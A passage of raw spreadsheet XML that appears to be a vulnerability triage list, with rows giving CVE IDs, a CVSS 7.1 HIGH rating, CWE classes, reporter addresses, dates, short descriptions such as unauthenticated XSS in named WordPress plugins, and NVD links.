t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1308" s="5" t="inlineStr"><is><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is></c><c r="S1308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t></is></c></row><row r="1309"><c r="A1309" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1309" s="5" t="inlineStr"><is><t>CVE-2026-82076</t></is></c><c r="D1309" s="5" t="n"><v>7.1</v></c><c r="E1309" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1309" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1309" s="5" t="inlineStr" /><c r="H1309" s="5" t="n"><v>0.003</v></c><c r="I1309" s="5" t="inlineStr" /><c r="J1309" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1309" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1309" s="5" t="inlineStr" /><c r="M1309" s="5" t="inlineStr" /><c r="N1309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1309" s="5" t="inlineStr" /><c r="Q1309" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1309" s="5" t="inlineStr"><is><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is></c><c r="S1309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t></is></c></row><row r="1310"><c r="A1310" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1310" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1310" s="5" t="inlineStr"><is><t>CVE-2026-84192</t></is></c><c r="D1310" s="5" t="n"><v>7.1</v></c><c r="E1310" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1310" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1310" s="5" t="inlineStr" /><c r="H1310" s="5" t="n"><v>0.002</v></c><c r="I1310" s="5" t="inlineStr" /><c r="J1310" s="5" t="inlineStr" /><c r="K1310" s="5" t="inlineStr" /><c r="L1310" s="5" t="inlineStr" /><c r="M1310" s="5" t="inlineStr" /><c r="N1310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1310" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1310" s="5" t="inlineStr" /><c r="Q1310" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1310" s="5" t="inlineStr"><is><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is></c><c r="S1310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84192</t></is></c></row><row r="1311"><c r="A1311" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1311" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1311" s="5" t="inlineStr"><is><t>CVE-2026-84205</t></is></c><c r="D1311" s="5" t="n"><v>7.1</v></c><c r="E1311" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1311" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1311" s="5" t="inlineStr" /><c r="H1311" s="5" t="n"><v>0.002</v></c><c r="I1311" s="5" t="inlineStr" /><c r="J1311" s="5" t="inlineStr" /><c r="K1311" s="5" t="inlineStr" /><c r="L1311" s="5" t="inlineStr" /><c r="M1311" s="5" t="inlineStr" /><c r="N1311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1311" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1311" s="5" t="inlineStr" /><c r="Q1311" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1311" s="5" t="inlineStr"><is><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is></c><c r="S1311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84205</t></is></c></row><row r="1312"><c r="A1312" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1312" s="5" t="inlineStr"><is><t>CVE-2026-84817</t></is></c><c r="D1312" s="5" t="n"><v>7.1</v></c><c r="E1312" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1312" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1312" s="5" t="inlineStr" /><c r="H1312" s="5" t="n"><v>0.001</v></c><c r="I1312" s="5" t="inlineStr" /><c r="J1312" s="5" t="inlineStr" /><c r="K1312" s="5" t="inlineStr" /><c r="L1312" s="5" t="inlineStr" /><c r="M1312" s="5" t="inlineStr" /><c r="N1312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1312" s="5" t="inlineStr" /><c r="Q1312" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1312" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t></is></c><c r="S1312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t></is></c></row><row r="1313"><c r="A1313" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1313" s="5" t="inlineStr"><is><t>CVE-2026-84818</t></is></c><c r="D1313" s="5" t="n"><v>7.1</v></c><c r="E1313" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1313" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1313" s="5" t="inlineStr" /><c r="H1313" s="5" t="n"><v>0.001</v></c><c r="I1313" s="5" t="inlineStr" /><c r="J1313" s="5" t="inlineStr" /><c r="K1313" s="5" t="inlineStr" /><c r="L1313" s="5" t="inlineStr" /><c r="M1313" s="5" t="inlineStr" /><c r="N1313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1313" s="5" t="inlineStr" /><c r="Q1313" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1313" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t></is></c><c r="S1313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t></is></c></row><row r="1314"><c r="A1314" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1314" s="5" t="inlineStr"><is><t>CVE-2026-84820</t></is></c><c r="D1314" s="5" t="n"><v>7.1</v></c><c r="E1314" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1314" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1314" s="5" t="inlineStr" /><c r="H1314" s="5" t="n"><v>0.001</v></c><c r="I1314" s="5" t="inlineStr" /><c r="J1314" s="5" t="inlineStr" /><c r="K1314" s="5" t="inlineStr" /><c r="L1314" s="5" t="inlineStr" /><c r="M1314" s="5" t="inlineStr" /><c r="N1314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1314" s="5" t="inlineStr" /><c r="Q1314" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1314" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t></is></c><c r="S1314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t></is></c></row><row r="1315"><c r="A1315" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1315" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1315" s="5" t="inlineStr"><is><t>CVE-2026-85163</t></is></c><c r="D1315" s="5" t="n"><v>7.1</v></c><c r="E1315" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1315" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1315" s="5" t="inlineStr" /><c r="H1315" s="5" t="n"><v>0.002</v></c><c r="I1315" s="5" t="inlineStr" /><c r="J1315" s="5" t="inlineStr" /><c r="K1315" s="5" t="inlineStr" /><c r="L1315" s="5" t="inlineStr" /><c r="M1315" s="5" t="inlineStr" /><c r="N1315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1315" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1315" s="5" t="inlineStr" /><c r="Q1315" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1315" s="5" t="inlineStr"><is><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is></c><c r="S1315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85163</t></is></c></row><row r="1316"><c r="A1316" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1316" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1316" s="5" t="inlineStr"><is><t>CVE-2026-85164</t></is></c><c r="D1316" s="5" t="n"><v>7.1</v></c><c r="E1316" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1316" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1316" s="5" t="inlineStr" /><c r="H1316" s="5" t="n"><v>0.002</v></c><c r="I1316" s="5" t="inlineStr" /><c r="J1316" s="5" t="inlineStr" /><c r="K1316" s="5" t="inlineStr" /><c r="L1316" s="5" t="inlineStr" /><c r="M1316" s="5" t="inlineStr" /><c r="N1316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1316" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1316" s="5" t="inlineStr" /><c r="Q1316" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1316" s="5" t="inlineStr"><is><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is></c><c r="S1316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85164</t></is></c></row><row r="1317"><c r="A1317" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1317" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1317" s="5" t="inlineStr"><is><t>CVE-2026-85170</t></is></c><c r="D1317" s="5" t="n"><v>7.1</v></c><c r="E1317" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1317" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1317" s="5" t="inlineStr" /><c r="H1317" s="5" t="n"><v>0.002</v></c><c r="I1317" s="5" t="inlineStr" /><c r="J1317" s="5" t="inlineStr" /><c r="K1317" s="5" t="inlineStr" /><c r="L1317" s="5" t="inlineStr" /><c r="M1317" s="5" t="inlineStr" /><c r="N1317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1317" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1317" s="5" t="inlineStr" /><c r="Q1317" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R1317" s="5" t="inlineStr"><is><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is></c><c r="S1317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85170</t></is></c></row><row r="1318"><c r="A1318" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1318" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1318" s="5" t="inlineStr"><is><t>CVE-2026-85451</t></is></c><c r="D1318" s="5" t="n"><v>7.1</v></c><c r="E1318" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1318" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1318" s="5" t="inlineStr" /><c r="H1318" s="5" t="n"><v>0.002</v></c><c r="I1318" s="5" t="inlineStr" /><c r="J1318" s="5" t="inlineStr" /><c r="K1318" s="5" t="inlineStr" /><c r="L1318" s="5" t="inlineStr" /><c r="M1318" s="5" t="inlineStr" /><c r="N1318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1318" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1318" s="5" t="inlineStr" /><c r="Q1318" s="5" t="inlineStr"><is><t>CWE-798</t></is></c><c r="R1318" s="5" t="inlineStr"><is><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is></c><c r="S1318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85451</t></is></c></row><row r="1319"><c r="A1319" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1319" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1319" s="5" t="inlineStr"><is><t>CVE-2026-85580</t></is></c><c r="D1319" s="5" t="n"><v>7.1</v></c><c r="E1319" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1319" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1319" s="5" t="inlineStr" /><c r="H1319" s="5" t="n"><v>0.005</v></c><c r="I1319" s="5" t="inlineStr" /><c r="J1319" s="5" t="inlineStr" /><c r="K1319" s="5" t="inlineStr" /><c r="L1319" s="5" t="inlineStr" /><c r="M1319" s="5" t="inlineStr" /><c r="N1319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1319" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1319" s="5" t="inlineStr" /><c r="Q1319" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1319" s="5" t="inlineStr"><is><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is></c><c r="S1319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85580</t></is></c></row><row r="1320"><c r="A1320" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1320" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1320" s="5" t="inlineStr"><is><t>CVE-2026-85582</t></is></c><c r="D1320" s="5" t="n"><v>7.1</v></c><c r="E1320" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1320" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1320" s="5" t="inlineStr" /><c r="H1320" s="5" t="n"><v>0.004</v></c><c r="I1320" s="5" t="inlineStr" /><c r="J1320" s="5" t="inlineStr" /><c r="K1320" s="5" t="inlineStr" /><c r="L1320" s="5" t="inlineStr" /><c r="M1320" s="5" t="inlineStr" /><c r="N1320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1320" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1320" s="5" t="inlineStr" /><c r="Q1320" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1320" s="5" t="inlineStr"><is><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is></c><c r="S1320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85582</t></is></c></row><row r="1321"><c r="A1321" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1321" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1321" s="5" t="inlineStr"><is><t>CVE-2026-85590</t></is></c><c r="D1321" s="5" t="n"><v>7.1</v></c><c r="E1321" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1321" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1321" s="5" t="inlineStr" /><c r="H1321" s="5" t="n"><v>0.004</v></c><c r="I1321" s="5" t="inlineStr" /><c r="J1321" s="5" t="inlineStr" /><c r="K1321" s="5" t="inlineStr" /><c r="L1321" s="5" t="inlineStr" /><c r="M1321" s="5" t="inlineStr" /><c r="N1321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1321" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1321" s="5" t="inlineStr" /><c r="Q1321" s="5" t="inlineStr"><is><t>CWE-308</t></is></c><c r="R1321" s="5" t="inlineStr"><is><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is></c><c r="S1321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85590</t></is></c></row><row r="1322"><c r="A1322" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1322" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1322" s="5" t="inlineStr"><is><t>CVE-2026-85654</t></is></c><c r="D1322" s="5" t="n"><v>7.1</v></c><c r="E1322" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1322" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1322" s="5" t="inlineStr" /><c r="H1322" s="5" t="n"><v>0.001</v></c><c r="I1322" s="5" t="inlineStr" /><c r="J1322" s="5" t="inlineStr" /><c r="K1322" s="5" t="inlineStr" /><c r="L1322" s="5" t="inlineStr" /><c r="M1322" s="5" t="inlineStr" /><c r="N1322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1322" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1322" s="5" t="inlineStr" /><c r="Q1322" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R1322" s="5" t="inlineStr"><is><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is></c><c r="S1322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85654</t></is></c></row><row r="1323"><c r="A1323" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1323" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1323" s="5" t="inlineStr"><is><t>CVE-2026-85689</t></is></c><c r="D1323" s="5" t="n"><v>7.1</v></c><c r="E1323" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1323" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1323" s="5" t="inlineStr" /><c r="H1323" s="5" t="n"><v>0.003</v></c><c r="I1323" s="5" t="inlineStr" /><c r="J1323" s="5" t="inlineStr"><is><t>postgresql</t></is></c><c r="K1323" s="5" t="inlineStr" /><c r="L1323" s="5" t="inlineStr" /><c r="M1323" s="5" t="inlineStr" /><c r="N1323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1323" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1323" s="5" t="inlineStr" /><c r="Q1323" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1323" s="5" t="inlineStr"><is><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is></c><c r="S1323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85689</t></is></c></row><row r="1324"><c r="A1324" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1324" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1324" s="5" t="inlineStr"><is><t>CVE-2026-85787</t></is></c><c r="D1324" s="5" t="n"><v>7.1</v></c><c r="E1324" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1324" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1324" s="5" t="inlineStr" /><c r="H1324" s="5" t="n"><v>0.002</v></c><c r="I1324" s="5" t="inlineStr" /><c r="J1324" s="5" t="inlineStr" /><c r="K1324" s="5" t="inlineStr" /><c r="L1324" s="5" t="inlineStr" /><c r="M1324" s="5" t="inlineStr" /><c r="N1324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1324" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1324" s="5" t="inlineStr" /><c r="Q1324" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="R1324" s="5" t="inlineStr"><is><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is></c><c r="S1324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85787</t></is></c></row><row r="1325"><c r="A1325" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1325" s="5" t="inlineStr"><is><t>CVE-2026-86074</t></is></c><c r="D1325" s="5" t="n"><v>7.1</v></c><c r="E1325" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1325" s="5" t="inlineStr" /><c r="H1325" s="5" t="n"><v>0.003</v></c><c r="I1325" s="5" t="inlineStr" /><c r="J1325" s="5" t="inlineStr" /><c r="K1325" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1325" s="5" t="inlineStr" /><c r="M1325" s="5" t="inlineStr" /><c r="N1325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1325" s="5" t="inlineStr" /><c r="Q1325" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1325" s="5" t="inlineStr"><is><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is></c><c r="S1325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t></is></c></row><row r="1326"><c r="A1326" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1326" s="5" t="inlineStr"><is><t>CVE-2026-86081</t></is></c><c r="D1326" s="5" t="n"><v>7.1</v></c><c r="E1326" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1326" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1326" s="5" t="inlineStr" /><c r="H1326" s="5" t="n"><v>0.003</v></c><c r="I1326" s="5" t="inlineStr" /><c r="J1326" s="5" t="inlineStr" /><c r="K1326" s="5" t="inlineStr" /><c r="L1326" s="5" t="inlineStr" /><c r="M1326" s="5" t="inlineStr" /><c r="N1326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1326" s="5" t="inlineStr" /><c r="Q1326" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R1326" s="5" t="inlineStr"><is><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is></c><c r="S1326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t></is></c></row><row r="1327"><c r="A1327" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1327" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1327" s="5" t="inlineStr"><is><t>CVE-2026-86091</t></is></c><c r="D1327" s="5" t="n"><v>7.1</v></c><c r="E1327" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1327" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1327" s="5" t="inlineStr" /><c r="H1327" s="5" t="n"><v>0.003</v></c><c r="I1327" s="5" t="inlineStr" /><c r="J1327" s="5" t="inlineStr" /><c r="K1327" s="5" t="inlineStr" /><c r="L1327" s="5" t="inlineStr" /><c r="M1327" s="5" t="inlineStr" /><c r="N1327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1327" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1327" s="5" t="inlineStr" /><c r="Q1327" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1327" s="5" t="inlineStr"><is><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is></c><c r="S1327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86091</t></is></c></row><row r="1328"><c r="A1328" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1328" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1328" s="5" t="inlineStr"><is><t>CVE-2026-86111</t></is></c><c r="D1328" s="5" t="n"><v>7.1</v></c><c r="E1328" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1328" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1328" s="5" t="inlineStr" /><c r="H1328" s="5" t="n"><v>0.003</v></c><c r="I1328" s="5" t="inlineStr" /><c r="J1328" s="5" t="inlineStr" /><c r="K1328" s="5" t="inlineStr" /><c r="L1328" s="5" t="inlineStr" /><c r="M1328" s="5" t="inlineStr" /><c r="N1328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1328" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1328" s="5" t="inlineStr" /><c r="Q1328" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1328" s="5" t="inlineStr"><is><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is></c><c r="S1328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86111</t></is></c></row><row r="1329"><c r="A1329" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1329" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1329" s="5" t="inlineStr"><is><t>CVE-2026-86113</t></is></c><c r="D1329" s="5" t="n"><v>7.1</v></c><c r="E1329" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1329" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1329" s="5" t="inlineStr" /><c r="H1329" s="5" t="n"><v>0.002</v></c><c r="I1329" s="5" t="inlineStr" /><c r="J1329" s="5" t="inlineStr" /><c r="K1329" s="5" t="inlineStr" /><c r="L1329" s="5" t="inlineStr" /><c r="M1329" s="5" t="inlineStr" /><c r="N1329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1329" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1329" s="5" t="inlineStr" /><c r="Q1329" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1329" s="5" t="inlineStr"><is><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is></c><c r="S1329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86113</t></is></c></row><row r="1330"><c r="A1330" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1330" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1330" s="5" t="inlineStr"><is><t>CVE-2026-86116</t></is></c><c r="D1330" s="5" t="n"><v>7.1</v></c><c r="E1330" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1330" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1330" s="5" t="inlineStr" /><c r="H1330" s="5" t="n"><v>0.002</v></c><c r="I1330" s="5" t="inlineStr" /><c r="J1330" s="5" t="inlineStr" /><c r="K1330" s="5" t="inlineStr" /><c r="L1330" s="5" t="inlineStr" /><c r="M1330" s="5" t="inlineStr" /><c r="N1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1330" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1330" s="5" t="inlineStr" /><c r="Q1330" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1330" s="5" t="inlineStr"><is><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is></c><c r="S1330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86116</t></is></c></row><row r="1331"><c r="A1331" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1331" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1331" s="5" t="inlineStr"><is><t>CVE-2026-86175</t></is></c><c r="D1331" s="5" t="n"><v>7.1</v></c><c r="E1331" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1331" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1331" s="5" t="inlineStr" /><c r="H1331" s="5" t="n"><v>0.003</v></c><c r="I1331" s="5" t="inlineStr" /><c r="J1331" s="5" t="inlineStr" /><c r="K1331" s="5" t="inlineStr" /><c r="L1331" s="5" t="inlineStr" /><c r="M1331" s="5" t="inlineStr" /><c r="N1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1331" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1331" s="5" t="inlineStr" /><c r="Q1331" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1331" s="5" t="inlineStr"><is><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is></c><c r="S1331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86175</t></is></c></row><row r="1332"><c r="A1332" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1332" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1332" s="5" t="inlineStr"><is><t>CVE-2026-86283</t></is></c><c r="D1332" s="5" t="n"><v>7.1</v></c><c r="E1332" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1332" s="5" t="inlineStr"><is><t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t></is></c><c r="G1332" s="5" t="inlineStr" /><c r="H1332" s="5" t="n"><v>0.002</v></c><c r="I1332" s="5" t="inlineStr" /><c r="J1332" s="5" t="inlineStr" /><c r="K1332" s="5" t="inlineStr" /><c r="L1332" s="5" t="inlineStr" /><c r="M1332" s="5" t="inlineStr" /><c r="N1332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1332" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1332" s="5" t="inlineStr" /><c r="Q1332" s="5" t="inlineStr"><is><t>CWE-285, CWE-862</t></is></c><c r="R1332" s="5" t="inlineStr"><is><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is></c><c r="S1332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86283</t></is></c></row><row r="1333"><c r="A1333" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1333" s="5" t="inlineStr"><is><t>CVE-2026-86713</t></is></c><c r="D1333" s="5" t="n"><v>7.1</v></c><c r="E1333" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1333" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1333" s="5" t="inlineStr" /><c r="H1333" s="5" t="n"><v>0.004</v></c><c r="I1333" s="5" t="inlineStr" /><c r="J1333" s="5" t="inlineStr" /><c r="K1333" s="5" t="inlineStr" /><c r="L1333" s="5" t="inlineStr" /><c r="M1333" s="5" t="inlineStr" /><c r="N1333" s="5" 